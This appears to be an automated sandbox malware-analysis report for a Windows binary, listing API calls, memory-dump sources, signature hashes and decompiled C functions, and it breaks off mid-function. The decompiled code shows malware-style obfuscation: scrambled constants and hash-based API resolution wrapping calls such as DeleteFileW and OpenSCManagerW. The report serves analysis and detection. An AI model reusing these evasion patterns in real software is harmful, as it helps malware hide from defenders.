0x6e9b86b5
0x6e9b86b7
0x6e9b86b9
0x6e9b86be
0x6e9b86c6
0x6e9b86ca
0x6e9b86ce
0x6e9b86ce
0x6e9b86d4
0x00000000
0x6e9b86d4
0x6e9b867e
0x6e9b8680
0x00000000
0x6e9b8680
0x6e9b7f90
0x6e9b7f88
0x6e9b7d47
0x6e9b7d4f
0x6e9b7d4f
0x6e9b7d52
0x6e9b7d57
0x6e9b7d5a
0x6e9b7d5b
0x6e9b7d5e
0x6e9b7d61
0x6e9b7d92
0x6e9b7d97
0x6e9b7d9a
0x6e9b7d9b
0x6e9b7d9e
0x6e9b7db9
0x6e9b7dbb
0x6e9b7dbd
0x6e9b7dc5
0x6e9b7dca
0x6e9b7dcb
0x6e9b7dcc
0x6e9b7dd1
0x6e9b7da0
0x6e9b7da5
0x6e9b7da5
0x6e9b7da9
0x6e9b7dae
0x6e9b7db2
0x6e9b7db2
0x6e9b7dd4
0x6e9b7ddc
0x6e9b7de4
0x6e9b7de9
0x6e9b7df0
0x6e9b7df0
0x6e9b7df6
0x6e9b7dfb
0x6e9b7e02
0x6e9b7e03
0x6e9b7e04
0x6e9b7e05
0x6e9b7e0a
0x6e9b7e0e
0x6e9b7e13
0x6e9b7e1d
0x6e9b7e22
0x6e9b7e25
0x6e9b7e29
0x6e9b7e2e
0x6e9b7e32
0x6e9b7e37
0x6e9b7e3b
0x6e9b7e41
0x6e9b7e47
0x6e9b7e48
0x6e9b7e48
0x6e9b7e48
0x6e9b7e4b
0x6e9b7e4e
0x6e9b7e52
0x6e9b7e55
0x6e9b7e59
0x6e9b7e5e
0x6e9b7e62
0x6e9b7e67
0x6e9b7e6a
0x6e9b7e6a
0x6e9b7e75
0x6e9b7e7d
0x00000000
0x6e9b7e7d
0x6e9b7d68
0x6e9b7d6b
0x6e9b7d71
0x6e9b7d74
0x6e9b7d76
0x6e9b7d8a
0x6e9b7d8a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9b7d78
0x6e9b7d78
0x6e9b7d78
0x6e9b7d7a
0x6e9b7d7d
0x6e9b7d7f
0x6e9b7d82
0x6e9b7d82
0x6e9b7d82
0x6e9b7d87
0x00000000
0x6e9b7e80
0x6e9b7e80
0x6e9b7e85
0x6e9b7e85
0x00000000
0x6e9b7d57
0x00000000
0x00000000
0x00000000
0x6e9b7bd8
0x6e9b7bd8
0x6e9b7bd8
0x6e9b7bd9
0x6e9b7bdb
0x6e9b7bdd
0x6e9b7be3
0x6e9b7be6
0x6e9b7be8
0x6e9b7be9
0x6e9b7bec
0x6e9b7bee
0x6e9b7bee
0x6e9b7bef
0x6e9b7bf2
0x6e9b7bf2
0x6e9b7bf5
0x6e9b7bf5
0x00000000
0x6e9b7bd8
0x6e9b89fd
0x6e9b89fd
0x6e9b89fe
0x6e9b8a04
0x6e9b8a04

APIs

__aulldiv.LIBCMT ref: 6E9B6692
__aullrem.LIBCMT ref: 6E9B66C6
GetTickCount64.KERNEL32 ref: 6E9B676C
GetTickCount64.KERNEL32 ref: 6E9B6772
GetTickCount64.KERNEL32 ref: 6E9B67A1
GetTickCount64.KERNEL32 ref: 6E9B67A7
GetShellWindow.USER32 ref: 6E9B6927
GetOEMCP.KERNEL32 ref: 6E9B69D2

Part of subcall function 6E9B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5E04
Part of subcall function 6E9B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9B5E74
Part of subcall function 6E9B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E9B5E93
Part of subcall function 6E9B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E9B5EA4

CoFreeUnusedLibraries.OLE32 ref: 6E9B6A30

Part of subcall function 6E9B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E9B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E9B5A3C
Part of subcall function 6E9B5A30: CloseClipboard.USER32 ref: 6E9B5A73
Part of subcall function 6E9B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E9B5B30

Strings

?, xrefs: 6E9B691B

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$ClipboardWindow$Open$CheckCloseDimensionsFreeLibrariesMarkMenuShellSwitchThreadUnothrow_t@std@@@Unused__aulldiv__aullrem__ehfuncinfo$??2@
String ID: ?
API String ID: 1511855008-1684325040
Opcode ID: a3bda2f4c2dba6171f27a29830d9f1327a9f426674f05da158d35632c4c86e64
Instruction ID: feb4d5fb6d282f458fe21f4023dc38e841682a259f47522a551f9c03b3f85a0f
Opcode Fuzzy Hash: a3bda2f4c2dba6171f27a29830d9f1327a9f426674f05da158d35632c4c86e64
Instruction Fuzzy Hash: AF136C31C14B5D8ACB26DFBAC8416AEF375AF9A340F148756E80977291EB30A9C1DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00D0F790, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00D0F790(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				int _t48;
				signed int _t50;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00D12523(_t39);
				_v20 = 0x305f8e;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x5f829bc1;
				_v12 = 0x22b27e;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0x22ee;
				_v12 = _v12 ^ 0x000c4601;
				_v8 = 0xcd41e2;
				_v8 = _v8 + 0xd868;
				_v8 = _v8 + 0xd31f;
				_t50 = 0x5f;
				_v8 = _v8 / _t50;
				_v8 = _v8 ^ 0x000a754c;
				_v16 = 0x592d24;
				_v16 = _v16 | 0x8ee4cdff;
				_v16 = _v16 ^ 0x8efaae11;
				E00CF2309(_t50 + 0x2c, _t50, _t50, 0x7c50bf37, _t50, 0x9c9047d0);
				_t48 = DeleteFileW(_a8); // executed
				return _t48;
			}

0x00d0f796
0x00d0f799
0x00d0f79c
0x00d0f7a1
0x00d0f7a6
0x00d0f7b0
0x00d0f7b6
0x00d0f7bd
0x00d0f7c4
0x00d0f7c8
0x00d0f7cf
0x00d0f7d6
0x00d0f7dd
0x00d0f7e4
0x00d0f7f0
0x00d0f7f8
0x00d0f7fb
0x00d0f802
0x00d0f809
0x00d0f810
0x00d0f82e
0x00d0f839
0x00d0f83e

APIs

DeleteFileW.KERNEL32(8EFAAE11), ref: 00D0F839

Strings

", xrefs: 00D0F7C8
Lu, xrefs: 00D0F81A
Lu, xrefs: 00D0F7EB
$-Y, xrefs: 00D0F802

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: DeleteFile
String ID: $-Y$Lu$Lu$"
API String ID: 4033686569-1114282491
Opcode ID: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction ID: 3fb6db7a1da9d9b75990d4cb5dd598ce2c5a87bc0786492c4126dda1b9012a96
Opcode Fuzzy Hash: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction Fuzzy Hash: 4511F5B6C0020CFBDF09DFE4CC4A8AEBBB5FB54318F108588E915AA251D3B59B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DB9B3, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

_free.LIBCMT ref: 6E9DBABE
_free.LIBCMT ref: 6E9DBAD5
_free.LIBCMT ref: 6E9DBAF4
_free.LIBCMT ref: 6E9DBB0F
_free.LIBCMT ref: 6E9DBB26

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 221c91657a9e5e588435b74419d549411778584be15f97f354e8ae445b5301af
Instruction ID: d02e1a5aa4f21bee5781f1c4b63d7605401e46c75c3a56daba07daec99b539b4
Opcode Fuzzy Hash: 221c91657a9e5e588435b74419d549411778584be15f97f354e8ae445b5301af
Instruction Fuzzy Hash: 9551B131A00B15AFDB10DFA9C840AAA77FCEF59724F408569E809DB258F735D909CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B4AE0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4B16
std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4B36
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4B56
std::_Facet_Register.LIBCPMT ref: 6E9B4BF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4C13

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 1369c44e41b121105b27fcb054490226deab7d747704bc3f1d2a8f2c3bd050f9
Instruction ID: a8ec5da0f61aefda6367f2d5e7da6827b0d9bb813772eda43f114c83186734dd
Opcode Fuzzy Hash: 1369c44e41b121105b27fcb054490226deab7d747704bc3f1d2a8f2c3bd050f9
Instruction Fuzzy Hash: D3418B71A042158FCB11DFD5C480BEEB7B8EF95B18F10495DD906AB281EB30EA46CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B17B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B17DD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E9B182C

Part of subcall function 6E9C60DA: _Yarn.LIBCPMT ref: 6E9C60F9
Part of subcall function 6E9C60DA: _Yarn.LIBCPMT ref: 6E9C611D

__CxxThrowException@8.LIBVCRUNTIME ref: 6E9B185E

Strings

bad locale name, xrefs: 6E9B1848

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 3b9ab0cca94cdea79e0f152c5e618307a5343fe67609ac8aad222697f7425d85
Instruction ID: 3f77ea9d9291d63754c63364459e5d3912c314b991aae53ac3898e101481a0d8
Opcode Fuzzy Hash: 3b9ab0cca94cdea79e0f152c5e618307a5343fe67609ac8aad222697f7425d85
Instruction Fuzzy Hash: 3C11BE71814B44DED720CFA9C800B8BBBF8EF29614F008A5EE459D7B81D775E108CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DD850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DD95D: _abort.LIBCMT ref: 6E9DD98A
Part of subcall function 6E9DD95D: _free.LIBCMT ref: 6E9DD9BD

Part of subcall function 6E9DD5E4: GetOEMCP.KERNEL32(00000000,6E9DD86D,?,?,?), ref: 6E9DD60F

_free.LIBCMT ref: 6E9DD8CA
_free.LIBCMT ref: 6E9DD900

Strings

-, xrefs: 6E9DD953

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$_abort
String ID: -
API String ID: 195396716-1294268861
Opcode ID: 30e974d184cb1e54df13bb3f8613d40a897d52a26192135b9340524a56275e5a
Instruction ID: 3acb5a8d61273fcf56b19c9773b1a15da3c573d80318e40da7d62b1149f26089
Opcode Fuzzy Hash: 30e974d184cb1e54df13bb3f8613d40a897d52a26192135b9340524a56275e5a
Instruction Fuzzy Hash: BA31B231504A59AFDB01DFA8D840BDA7BF8EF81324F1185A9E9148B390EB32DC68CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D0B0E5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D0B0E5(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;

				E00D12523(_t43);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x970fc6;
				_v28 = 0xf733cf;
				_v12 = 0x7d503f;
				_v12 = _v12 | 0x482efb7d;
				_v12 = _v12 + 0xffffad5b;
				_v12 = _v12 ^ 0x48710332;
				_v20 = 0x599c2f;
				_t54 = 0x26;
				_v20 = _v20 / _t54;
				_v20 = _v20 ^ 0x00074c3c;
				_v8 = 0x25764d;
				_v8 = _v8 + 0xffffd21e;
				_v8 = _v8 + 0x28dd;
				_v8 = _v8 ^ 0x00291a50;
				_v16 = 0x4f32db;
				_v16 = _v16 | 0x18cb750c;
				_v16 = _v16 ^ 0x18cb774b;
				_t51 = E00CF2309(0x234, _t54, _t54, 0x491df8aa, _t54, 0x9c9047d0);
				_t52 =  *_t51(_a16, 0, _a24, 0x28, __ecx, __edx, 0x28, _a8, 0, _a16, _a20, _a24); // executed
				return _t52;
			}

0x00d0b0fd
0x00d0b102
0x00d0b109
0x00d0b112
0x00d0b119
0x00d0b120
0x00d0b127
0x00d0b12e
0x00d0b135
0x00d0b141
0x00d0b149
0x00d0b14c
0x00d0b153
0x00d0b15a
0x00d0b161
0x00d0b168
0x00d0b16f
0x00d0b176
0x00d0b17d
0x00d0b19d
0x00d0b1af
0x00d0b1b4

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,00970FC6,00000028), ref: 00D0B1AF

Strings

?P}, xrefs: 00D0B119
Mv%, xrefs: 00D0B153

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: FileHandleInformation
String ID: ?P}$Mv%
API String ID: 3935143524-2885159553
Opcode ID: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction ID: df56d95389377b03040cc2052760bca5ecd6059f1b01f134ef096ceb9b97d7dd
Opcode Fuzzy Hash: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction Fuzzy Hash: 792147B1D0160DFFDF54DF98CD4AAAEBBB1FB14305F108188E91566290D3B55B249F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D770F, Relevance: 4.6, APIs: 3, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

_free.LIBCMT ref: 6E9D77B5

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_abort_free
String ID:
API String ID: 2251421968-0
Opcode ID: 2971a0d7f592e7d7ab554a88257139d9d79fb9feb25adc24f60b63e5b49ed744
Instruction ID: 87a4f6b2e3cd5a76f33eb15c24cff76d37106b20dd31e39b2b3d03a2b479172f
Opcode Fuzzy Hash: 2971a0d7f592e7d7ab554a88257139d9d79fb9feb25adc24f60b63e5b49ed744
Instruction Fuzzy Hash: 5D418D31604916AFD754CFACC8C0AA9B7FDEF49324B24896DE415C7291E771E824CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D7879, Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6E9D78A5
__cftoe.LIBCMT ref: 6E9D78D7

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: ef25c3a41c9aefe0579a88eb08f9b523aa25c76ca6702f3a2d471f546e64a962
Instruction ID: 6842c4e5335851af2df334828dfd2f30e05fd9edd2308962c4c571371e1b8839
Opcode Fuzzy Hash: ef25c3a41c9aefe0579a88eb08f9b523aa25c76ca6702f3a2d471f546e64a962
Instruction Fuzzy Hash: A721F972814A2C7ADB255AD59C45EEE7B6CCF81734F20C516FC18951C0EF31CA58C9A1

Uniqueness

Uniqueness Score: -1.00%

Function 00D042E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00D042E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00D12523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E00CF2309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x00d042ed
0x00d042f2
0x00d042f4
0x00d042f7
0x00d042f9
0x00d042fa
0x00d042fd
0x00d04300
0x00d04301
0x00d04302
0x00d04307
0x00d04311
0x00d0431a
0x00d0431d
0x00d04320
0x00d0432d
0x00d04334
0x00d04337
0x00d0433b
0x00d04342
0x00d04349
0x00d04350
0x00d04357
0x00d0435e
0x00d0436b
0x00d04377
0x00d0437a
0x00d04381
0x00d04388
0x00d0438c
0x00d0439f
0x00d043aa
0x00d043b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 00D043AA

Strings

zAo+, xrefs: 00D04350

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: de019dc2af54b7962b3f772c3bcb654c9f26a5e6e83e972f217519a0a37b4480
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: D22148B1C00208FF9B08DF99D98A8EEBFB9FB44344F508199E515A7240D3B05B149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00D0FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E00D12523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E00CF2309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x00d0fea4
0x00d0fea9
0x00d0feaa
0x00d0fead
0x00d0feb1
0x00d0feb2
0x00d0feb7
0x00d0fec1
0x00d0fec8
0x00d0fecb
0x00d0fed2
0x00d0fed9
0x00d0fee0
0x00d0fee7
0x00d0feee
0x00d0fef5
0x00d0fefc
0x00d0ff03
0x00d0ff0a
0x00d0ff11
0x00d0ff18
0x00d0ff1c
0x00d0ff2f
0x00d0ff35
0x00d0ff3a
0x00d0ff3b
0x00d0ff3e
0x00d0ff3f
0x00d0ff4c
0x00d0ff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00D05191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 00D0FF4C

Strings

OMk, xrefs: 00D0FEC1

Memory Dump Source

Source File: 00000002.00000002.352217947.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: true

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 3ecfb3269531f960cb18031504bdab3e27edf9b294ebd7d3a983f768ec18bdde
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: E01116B1C0021CBBDB11EFA5D94A8EFBFB4EF44318F108088E91466211D7B55B149BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C67A5, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E9C67AC
std::locale::_Init.LIBCPMT ref: 6E9C67CD

Part of subcall function 6E9C5FD3: __EH_prolog3.LIBCMT ref: 6E9C5FDA
Part of subcall function 6E9C5FD3: std::_Lockit::_Lockit.LIBCPMT ref: 6E9C5FE5
Part of subcall function 6E9C5FD3: std::locale::_Setgloballocale.LIBCPMT ref: 6E9C6000
Part of subcall function 6E9C5FD3: _Yarn.LIBCPMT ref: 6E9C6016
Part of subcall function 6E9C5FD3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E9C6056

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 69af1f9641bfa35e4dd56934393377e693da59409cd9bbe743f3c2a7051b7deb
Instruction ID: f41edcba2843dedfcb8e33789247e79b6a30ff312b79f43d8c6839dd55e3649f
Opcode Fuzzy Hash: 69af1f9641bfa35e4dd56934393377e693da59409cd9bbe743f3c2a7051b7deb
Instruction Fuzzy Hash: 17E0DFB2A517225BE7262BE484003FCA5986FA1F2AF140C1AD6015FE80CBE0E8409FC3

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D723C, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9D7315

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fcaf30bb05719b488a0b862539f1b62d47f6ca89ffddb82a92c3bf54daffd96f
Instruction ID: 3ecbeaa35ea8034c745623893b40daa3fe3504a6a1fcaa3593914cc54d516670
Opcode Fuzzy Hash: fcaf30bb05719b488a0b862539f1b62d47f6ca89ffddb82a92c3bf54daffd96f
Instruction Fuzzy Hash: 33416D72A10A258FCB14CFADD48099DB7F5FF8D324B1586A9E915EB390D730AC458F81

Uniqueness

Uniqueness Score: -1.00%

Function 00D131D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00D131D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00D12523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
